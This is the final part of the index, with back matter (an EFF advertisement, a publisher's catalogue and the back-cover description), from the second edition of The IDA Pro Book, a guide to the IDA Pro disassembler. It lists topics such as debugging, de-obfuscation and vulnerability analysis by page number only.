sparse arrays, 259

splash screen, 44

sprintf function, 264, 273, 477

ssleay32.dll library, 232

SSLEAY32.idt file, 232

stack adjustments, 118

stack cleanup, 228

.stack database segment, 462

stack frames, 83–98

calling conventions for, 85–89

examples of, 89–93

as IDA structures, 146

local variable layout in, 89

viewing, 93–98

Stack pointer option, 110

stack pointers, adjustments for,

118–119

Stack Trace command, Debugger

menu, 528–529

stack traces, in debugger, 528–529

stack variables, 95, 102

Stack View window, 519

stack-allocated arrays, 132–134

stack-allocated structures, 138, 148

stack-based buffer overflow, 488

stack-manipulation operations, 11

standard calling convention, 87

standard structures, 151–154

standard template library (STL), 486

Start address attribute, 116

start function, 213, 443

Start Process option, Debugger menu,

516, 518

start symbol, 546

STARTITEM directives, 340

startup directory, FLAIR, 217, 224

startup routine, 224

startup signatures, 224–225

startup.bat file, 224

startup.idc, 577

statements, in IDC language, 254

static analysis, of malware, 6

static de-obfuscation of binaries,

454–472

script-oriented, 455–460

x86emu emulation-oriented,

460–472

and anti-debugging, 471–472

de-obfuscation using, 465–470

features of, 470–471

initialization of, 462

operation of, 463–465

Static func attribute, 117

static keyword, 254–255

static libraries, for FLIRT signatures,

217–219

static linking function, 22

statically linked binaries, 178

stats netnode, 537

stdcall calling convention, 87, 118,

230, 294, 468

stdcall functions, 116, 228, 464, 467,

558–559

_stdcall modifier, 87

Step button, x86emu Emulator

dialog, 463

Step command, 521

Step Into button, toolbar buttons, 522

Step Over button, toolbar buttons, 522

StepInto function, 532

StepOver function, 532–533

StepUntilRet function, 532

STL (standard template library), 486

INDEX 641

Stop on debugging message option,

Debugger Setup dialog, 546

Stop on debugging start option,

Debugger Setup dialog, 546

Stop on library load/unload option,

Debugger Setup dialog, 546

Stop on process entry point option,

Debugger Setup dialog, 546

Stop on thread start/exit option,

Debugger Setup dialog, 546

STOP_CODE constant, 383

storage, of bytes, 97

Store (Pack database) option, 52

store_til function, 369

stosb instruction, 458

strcat function, 253

strcpy function, 175, 253, 273,

477–478, 480

strdup function, 253

stream argument, 491

stream disassemblers, 28

string data configuration, 72, 123

string scanning, 70

strings

C-style null-terminated, 122

displaying in Strings windows, 70

double-clicking, 70

options for, 122–124

Unicode, 99

using on executable files, 28

utility, 27–28

strings command, 71, 212

strings utility, 446

Strings window

Display only defined strings

option, 71

Ignore instructions/data defini-

tions option, 71–72

overview, 70

strip utility, 18

stripping binary executable files, 18

strlen function, 264

strstr function, 264

struc_t (struct.hpp), datatypes for SDK,

293, 303, 306, 308, 311

Struct Var option, Edit menu, 147

struct.hpp (struc_t), datatypes for

SDK, 303

struct.hpp, for API, 293

structure definition

collapsed, 146

empty, 143

structure members, enumerating, 311

Structure name field, Create

Structure/Union dialog, 143

structure notation, 149

structure offset, applying, 147

structure selection dialog, 147

structure templates, using, 146–149

structured exception handling (SEH)

process, 472

structures

collapsing, 154

expanding, 153

fields, changing name of, 144

formatting global variables as, 149

master list of, 152

Structures window, 69, 142–143

stubs, 403–405

substr function, 264

successor instruction, 177

summary stack view, 97

superclass constructors, 164

support

Hex-Rays support page and

forums, 35

IDA Palace, 36

Ilfak’s blog, 36

official help documentation, 35

OpenRCE.org, 35

RCE forums, 35

supset function, 299

supstr function, 299

supval function, 299

supvals, 297–298

swidth component, 338

SWIG (Simplified Wrapper Interface

Generator), IDAPython, 503

Switch Debugger menu, Debugger

menu, 516

switch statements, compiler differ-

ences for, 416–420

Switch Thread option, Emulate

menu, 471

switch variable, 417

642 INDEX

symbols

appearing in comments, 175

dispalyed on Imports window, 69

global (external), 20

symbol-selection dialog, 113

Synchronize to idb option, 150

synchronizing activities, using

CollabREate, 504

synchronous debugger function, 532

synchronous interaction, 536–537

system calls, 89

-t command-line argument

(strings), 28

tabs, IDA desktop, 55

tags, 297

Take Memory Snapshot command,

Debugger menu, 542

.tar file, 36

Target assembler, 243

target assembly language syntax, 243

TASM (Borland’s Turbo

Assembler), 9

TCP session, 496

TEB (thread environment block),

439, 462, 556, 565, 576

tElock program, 438, 440, 442

Tenable Security, 342

term member, for plug-ins, 317

term method, 536

term_output_buffer function, 395

Terminal application, Mac, 194

Terminal keyboard settings dialog,

Mac, 195

terminal programs, Linux, 192

Terminate button, toolbar

buttons, 522

Terminate Process option, Debugger

menu, 517

text display, Linux, 192

Text option, Hex window, 67

Text Search dialog, 99

text searches, of database, 99

.text section, 241, 353, 355, 423

text view, switching to graph view, 185

text-mode user interface configura-

tion file, 39

The initial autoanalysis has been

finished message, 57, 211

third-generation languages, 4

third-party graph viewer, 176

this pointer, in C++, 156–157

This type of output file is not

supported message, 243

thiscall calling convention, 88, 156

thread environment block (TEB),

439, 462, 556, 565, 576

thread information block (TIB), 556

Thread Local Storage (TLS) callback

functions, 545–546, 556

ThreadInformationClass parameter, 559

Threads view, 519

thunk functions, 428–429

ThunRTMain function, 427

TIB (thread information block), 556

TIB[NNNNNNNN] database section, 565

til directory, 40

TIL files, 49

loading new, 155

overview, 154

sharing, 155–156

til2idb function, 367

tilib tool, Hex-Rays, 155

time stamp counter (TSC), 471

timelimit option, 194

tips and tricks, for IDA Desktop, 57

Title case, 124

TLS (Thread Local Storage) callback

functions, 545–546, 556

tmainCRTStartup function, 426

to address, in cross-references, 168

toggling values, 520

tool tip–style pop-up window, 129

toolbar

area, IDA desktop, 53

arrangements, 208

buttons, 208, 521–522

configuration menu, 209

customizing, 208–210

Toolbars command, 53

tools

c++filt utility, 25–26

for deep inspection, 27–29

dumpbin utility, 25

for file classification, 16–20

ldd utility, 22–23

nm utility, 20–21

objdump utility, 23–24

otool utility, 24

INDEX 643

Tools menu, PE Tools, 19

top-level directory, for SDK, 288–289

TouchArg function, 391

Trace buffer size option, Tracing

Options dialog, 526

Trace checkbox, Breakpoint Settings

dialog, 526

trace option, 526

Trace over debugger segments option,

Tracing Options dialog, 528

Trace over library functions option,

Tracing Options dialog, 528

trace_level parameter, 533

tracing, in debugger, 526–528

Tracing Options dialog, 526–528

trampoline, 493

translate function, 401

TriMedia libraries, 219

TSC (time stamp counter), 471

TTY console, 197

Turbodiff, 485

turn color off tag, 396

turn color on tag, 396

TVHEADLESS environment variable, 197

TVision library, 190

TVision port, 193

TVOPT settings, 193

tvtuning.txt, 193

two-digit hex values, 99

type component, 338

type field, 303, 338, 388

Type Libraries window, 75

typedef statement, 151

TypeDescriptor structure, 164

typeid operator, 163

typeinf.hpp, 293

typinf.hpp, 367

U hotkey, 119, 144

u_ana member, 385

u_emu member, 391

u_out member, 394

u_outspec function, 401

ua_next_xxx functions, 386

ua.hpp file, 293, 385

ui_notification_t constants, 305

uname command, 326

uncollapsing nodes, 187

uncompressing UPX binary, using

emulator, 467

unconditional branching

instructions, 11

Undefine option, 119, 435

undefine process, 436

undefining functions, 119

undetected string data, 72

undo command, absence of, 59

undo feature, 40

undocumented CPU instructions, 110

Ungroup Nodes option, 187

Unicode strings option, 71, 99, 447

universal unpacker, Hex-Rays, 550

Unix-style make files, 289

Unmatched Functions, PatchDiff2,

486–487

unsigned shifts, 458

untar archive, 37

upgrading, 34

uppercase letter codes, 21

UPX

decompression routine, 547–548

decompression stub, 442

packer, 442

program, 441, 548, 552–553

UPX-packed binaries, 540

Use “dup” construct option, 126

Use graph view by default checkbox,

Graph tab, 55

Use option key as meta key checkbox,

Terminal application, 194

USE_DANGEROUS_FUNCTIONS macro, 290

USE_STANDARD_FILE_FUNCTIONS macro,

291, 365

User cross-reference graph dialog, 183

user interface

of IDA Pro, 40

for plug-ins, 333–344

customized forms with SDK,

337–341

with Qt, 342–344

using SDK chooser dialogs,

334–337

Windows-only, 341–342

user interface notifications, 321

User xref charts, 182

User xref graph, 184

User Xrefs Chart option, Graphs

menu, 182

644 INDEX

__usercall calling convention, 431

user-generated cross-reference

graphs, 185

utilities directory, 36

-v command-line option (debugging

server), 571

va_arg macro, C++, 322

var_ prefix, 95

variables

in IDC language, 252–253

index values of, 132

names, IDA-generated, 96–97

vc32rtf signatures, 75

vcsample file, 289

Veracode, 476

version field, 317, 385

version member, 359

versions, 33

vertices, 64, 168

VGA font, 193

View menu

Cross References option, 477

Enumerate Heap option, 471

Pseudocode option, 500

View window, 530

viewing machine language bytes, 111

virtual addresses, 64

virtual functions, 157–160, 173

virtual machine-based obfuscation,

472–474

virtual repeatable comment, 108

VirtualAddress field, 353

VirtualAlloc function, 468, 477, 576,

578–579

virtualization

detecting, 449–451

processor-specific behavioral

changes, 451

specific behaviors, 450–451

specific hardware, 450

specific software, 450

software, 449

virtualizing obfuscator, 442

Visual C++ compiler, Microsoft, 114

Visual Studio suite, Microsoft, 25

Visual Studio Win32 Application

Wizard, 327

VMProtect, 442, 472

VMware Tools collection, 450–451

VPAGESIZE option, 202

vtables, in C++, 157–160

vulnerability advisory, 484

vulnerability analysis, 475–498

analyzing shellcode, 495–498

discovering vulnerabilities,

476–483

exploit-development process,

488–495

finding useful virtual addresses,

494–495

locating instruction sequences,

492–494

stack frame breakdown, 488–492

handling after-fact discoveries,

483–487

reasons for disassembly, 6–7

vulnerability discovery, 6

w suffix, 172, 447

Wait For Next Event (WFNE)

flags, 532

wait_for_next_event function, 538

wanted_hotkey data member, 318, 330

wanted_hotkey value, 318

wanted_name data member, 318, 330

Warning function, 263, 272

warning function, 305

warnings, for loaders, 49

wasBreak function, 323

Watch Address dialog, 530

Watch List option, Debugger

menu, 530

watch lists, 529

watch points, 529

watches, in debugger, 529–530

Weak name option, for named

locations, 105

weak symbol, marking, 105

web server, Apache, 23

Welcome dialog, 44

INDEX 645

WFNE (Wait For Next Event)

flags, 532

WFNE_CONT flag, 533

WFNE_SUSP event type, 533

Whittaker, Andy, 349

width characters, 395

width component, 338

Width field, 124

widths parameter, 336

wildcards, 205

Win32 Application Wizard, Visual

Studio, 327

Win32 Project template, 327

win32_remote.exe server

component, 570

win64_remotex64.exe server

component, 570

wince_remote_arm.dll server

component, 570

Windows

console mode for, 191

installing on, 36–37

launching installer, 36

“Windows Anti-Debug Reference”

article, 555–558

Windows Asynchronous Sockets

techniques, 504

Windows calculator program, 25

Windows CE ARM, 517

Windows library handle, 468

Windows menu, Save Desktop

option, 519

Windows PE binaries, ida-x86emu

plug-in, 462

Windows PE file, manually loading,

349–357

Windows PE loader (pe.ldw), 45

Windows registry key, 45

Windows SEH exceptions, 565

Windows SEH handlers, 565

wingraph32 application, 176

WinGraph32 window, 180

WinHelp-style help files, 204

wininet.dll file, 516

WinLicense, 442, 448

WinMain function, 422

WinMain variation, 421

Wireshark, 366, 451, 496

word. See 1 byte of storage (db)

Word function, 262

word-patching capability, 239

wrapper code, 180

write cross-references, 172

write traces, 526

write4 capability, 488

writelong function, 265

writeshort function, 265

writestr function, 265

ws2_32 networking library, 553

X Windows consoles, 193

X11, installing, 195

X.25-style network connection, 113

x86 code, 410

x86 compiler, 87

x86 hardware-debug registers, 472

x86 instruction, 204

x86 processor module, 47

x86emu breakpoints, 463

x86emu emulator, de-obfuscation of

binaries using, 460–472

and anti-debugging, 471–472

de-obfuscation using, 465–470

features of, 470–471

initialization of, 462

operation of, 463–465

x86emu Emulator dialog

Jump To Cursor button, 464

Push Data button, 465

Run button, 464

Run To Cursor button, 463, 466

Segments button, 464

Set Memory button, 464–465

Skip button, 463–464

Step button, 463

x86emu library function dialog, 469

x86emu plug-in, 461

x86emu Set Memory Values

dialog, 465

.xinitrc file, 195

XML templates, 360

xmodmap command, 196

.Xmodmap file, 195

646 INDEX

xmodmap utility, 195

xor instruction, 436

xrefblk_t structure, 283, 309, 312–313

xref.hpp file, 293–294, 309, 392

xrefs (cross-references).

See cross-references

Xrefs From graph, 181–182

Xrefs To graph, 180–181

XrefsFrom generator, 283

XrefType function, 267-268, 273, 309

xterm, running, 193

xtol function, 264

XXXset function, 298

XXXval function, 298

Y hotkey, 128

y variable, 91, 94

Yason, Mark Vincent, 165

Yes edge arrow, 62

You may start to explore the input file

right now message, 57

Zbikowski, Mark, 16

zoom control, keyboard, 62

ZwContinue function, 567

The Electronic Frontier Foundation (EFF) is the leading

organization defending civil liberties in the digital world. We defend

free speech on the Internet, fight illegal surveillance, promote the

rights of innovators to develop new digital technologies, and work to

ensure that the rights and freedoms we enjoy are enhanced —

rather than eroded — as our use of technology grows.

EFF has sued telecom giant AT&T for giving the NSA unfettered access to the

private communications of millions of their customers. eff.org/nsa

EFF’s Coders’ Rights Project is defending the rights of programmers and security

researchers to publish their findings without fear of legal challenges.

eff.org/freespeech

EFF's Patent Busting Project challenges overbroad patents that threaten

technological innovation. eff.org/patent

EFF is fighting prohibitive standards that would take away your right to receive and

use over-the-air television broadcasts any way you choose. eff.org/IP/fairuse

EFF has developed the Switzerland Network Testing Tool to give individuals the tools

to test for covert traffic filtering. eff.org/transparency

EFF is working to ensure that international treaties do not restrict our free speech,

privacy or digital consumer rights. eff.org/global

PRIVACY

FREE SPEECH

INNOVATION

FAIR USE

TRANSPARENCY

INTERNATIONAL

EFF is a member-supported organization. Join Now! www.eff.org/support

More no-nonsense books from NO STARCH PRESS

PRACTICAL PACKET

ANALYSIS, 2ND EDITION

Using Wireshark to Solve

Real-World Network Problems

by CHRIS SANDERS

JULY 2011, 280 PP., $49.95

ISBN 978-1-59327-266-1

METASPLOIT

A Penetration Tester's Guide

by DAVID KENNEDY, JIM O’GORMAN,

DEVON KEARNS, AND MATI AHARONI

JULY 2011, 344 PP., $49.95

ISBN 978-1-59327-288-3

THE TANGLED WEB

Securing Modern Web Applications

by MICHAL ZALEWSKI

SEPTEMBER 2011, 400 PP., $39.95

ISBN 978-1-59327-388-0

HACKING, 2ND EDITION

The Art of Exploitation

by JON ERICKSON

FEBRUARY 2008, 488 PP. W/CD, $49.95

ISBN 978-1-59327-144-2

GRAY HAT PYTHON

Python Programming for Hackers

and Reverse Engineers

by JUSTIN SEITZ

APRIL 2009, 216 PP., $39.95

ISBN 978-1-59327-192-3

THE ART OF DEBUGGING

with GDB, DDD, and Eclipse

by NORMAN MATLOFF and

PETER JAY SALZMAN

SEPTEMBER 2008, 280 PP., $39.95

ISBN 978-1-59327-174-9

UPDATES

Visit http://nostarch.com/idapro2.htm for updates, errata, and other information.

PHONE:

800.420.7240 OR

415.863.9900

MONDAY THROUGH FRIDAY,

9 A.M. TO 5 P.M. (PST)

EMAIL:

SALES@NOSTARCH.COM

WEB:

WWW.NOSTARCH.COM

JMP

EBP

SUB

T H E

I D A P R O

B O O K

T H E

I D A P R O

B O O K

T H E U N O F F I C I A L G U I D E T O T H E

W O R L D ’ S M O S T P O P U L A R D I S A S S E M B L E R

C H R I S E A G L E

2 N D

ED I T ION

“I wholeheartedly recommend The

IDA Pro Book to all IDA Pro users.”

—Ilfak Guilfanov,

creator of IDA Pro

www.nostarch.com

TH E F I N EST IN G E EK E N T E R TA IN M ENT™

SHELVE IN:

PROGRAMMING/

SOFTWARE DEVELOPMENT

$69.95 ($79.95 CDN)

I D A P R O

D E - O B F U S C A T E D

I D A P R O

D E - O B F U S C A T E D

No source code? No problem. With IDA Pro, the inter-

active disassembler, you live in a source code–optional

world. IDA can automatically analyze the millions of

opcodes that make up an executable and present you

with a disassembly. But at that point, your work is just

beginning. With The IDA Pro Book, you’ll learn how

to turn that mountain of mnemonics into something you

can actually use.

Hailed by the creator of IDA Pro as “profound, compre-

hensive, and accurate,” the second edition of The IDA

Pro Book covers everything from the very ﬁrst steps to

advanced automation techniques. You’ll ﬁnd complete

coverage of IDA’s new Qt-based user interface, as

well as increased coverage of the IDA debugger, the

Bochs debugger, and IDA scripting (especially using

IDAPython). But because humans are still smarter than

computers, you’ll even learn how to use IDA’s latest

interactive and scriptable interfaces to your advantage.

Save time and effort as you learn to:

• Navigate, comment, and modify disassembly

• Identify known library routines, so you can focus your

analysis on other areas of the code

• Use code graphing to quickly make sense of cross-

references and function calls

• Extend IDA to support new processors and ﬁletypes

using the SDK

• Explore popular plug-ins that make writing IDA scripts

easier, allow collaborative reverse engineering, and

much more

• Use IDA’s built-in debugger to tackle hostile and

obfuscated code

Whether you’re analyzing malware, conducting vulnerabil-

ity research, or reverse engineering software, a mastery

of IDA Pro is crucial to your success. Take your skills to the

next level with this 2nd edition of The IDA Pro Book.

A B O U T T H E A U T H O R

Chris Eagle is a Senior Lecturer of Computer Science

at the Naval Postgraduate School in Monterey, CA.

He is the author of many IDA plug-ins and co-author of

Gray Hat Hacking (McGraw-Hill), and he has spoken

at numerous security conferences, including Blackhat,

Defcon, Toorcon, and Shmoocon.

JMP

EBP

SUB

“I L I E F L A T.”

This book uses a lay-ﬂat binding that won’t sna p shut.

JMP

SUB

E A G L E

T H E I D A P R O B O O K

2 N D E D I T I O N

No.Starch.The.IDA.Pro.Book.The.Unofficial.Guide.To.The.Worlds.Most.Popular.Disassembler.2nd.Edition.Jul.2011.ISBN.1593272898

Navigation menu

Versions of this User Manual:

Views

Navigation